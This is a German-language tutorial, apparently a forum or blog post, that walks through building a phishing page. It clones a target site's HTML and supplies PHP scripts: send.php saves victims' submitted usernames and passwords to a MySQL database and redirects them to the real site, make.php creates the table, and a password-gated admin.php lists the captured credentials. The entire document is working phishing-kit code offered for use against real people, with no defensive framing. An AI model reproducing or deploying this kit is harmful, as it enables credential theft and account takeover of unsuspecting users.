1. Source code von der Webseite nehmen, welcher an euren Browser geschickt wurde. (Rechtsklick -> Queltext anzeigen -> und den Inhalt in eine .html-file abspeichern.
2. Nun haben wir ein Abbild von der Page
3. Bei einem beliebigen Free-Webspace Anbieter anmelden der zusätzlich noch eine SQL-Datenbank anbietet.
Erstellt nun folgende Dateien mit dem darunterliegendem Inhalt:
index.html
das ist der Source der kopierten Seite.
send.php
1 2 3 4 5 6 7 8 9 10 | < ?php include ("sqlconnect.php"); $username = $_POST["username"]; $userpasswort = $_POST["passwort"]; $eintrag = "INSERT INTO base (user, pwd) VALUES ('$username', '$userpasswort')"; $eintragen = mysql_query($eintrag); ?> <meta http-equiv="refresh" content="0; URL=http://blablub.com"> </meta> |
Ihr ersetzt “http://blablub.com” mit der Seite des “Opfers” (nachdem die Daten abgeschickt wurden). Dort wird er Quasi nach erfolgreicher Eingabe umgeleitet.
sqlconnect.php
1 2 3 4 5 6 7 8 | < ?php $server = "localhost"; $user = "root"; $pwd = "password"; $database = "data"; mysql_connect("$server","$user","$pwd") or die ("Keine Verbindung moeglich"); mysql_select_db("$database") or die ("Die Datenbank existiert nicht"); ?> |
“localhost” wird mit dem MySQL-Datenbankserver ersetzt, diesen bekommt ihr von eurem Free-Webspace Anbieter.
“root” wird mit dem MySQL-Benutzernamen ersetzt. (Gibts auch von Anbieter…)
“password” wird mit dem MySQL-Password ersetzt….
“data” ist mit dem Datenbanknamen zu überschreiben… (Ebenfalls Webspaceanbieter)
make.php
1 2 3 4 5 6 7 8 9 10 | < ?php include ("sqlconnect.php"); $sql = 'CREATE TABLE `base` (' . ' `user` VARCHAR(255) NOT NULL, ' . ' `pwd` VARCHAR(255) NOT NULL' . ' )' . ' ENGINE = myisam;'; $eintragen = mysql_query($sql); echo "Tabelle erstellt! Diese Datei kann nun gelöscht werden. (make.php)"; ?> |
admin.php
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 | < ?php include ("sqlconnect.php"); $ident = $_POST["pw"]; if (isset($ident)) { if ($ident=="deinpw") { $abfrage = "SELECT * FROM base"; $ergebnis = mysql_query($abfrage); while($row = mysql_fetch_object($ergebnis)) { echo "ID: $row->user"; echo " "; echo "PW: $row->pwd"; echo "<br />"; } } else { echo "Passwort falsch! Probiers nochmal..."; } } else { echo "<form action=\"admin.php\" method=\"post\">"; echo "<input type=\"text\" name=\"pw\" size=\"21\" value=\"pw eingeben\" maxlength=\"50\"/>"; echo "</form>"; } ?> |
anstatt “deinpw” gebt ihr ein belibiges Passwort ein.
Als nächstes ladet ihr die 5 Dateien auf eurem Webspace hoch und führt die “make.php” im Browser aus. Eure Seite könnt ihr über die index.html aufrufen. Die eingetragenen Daten des “Opfers” sind in der admin.php zu finden…
Folgende Files müssten dann auf eurem Webspace zu finden sein wenn ihr alles richtig gemacht habt.
index.html
send.php
sqlconnect.php
make.php
admin.php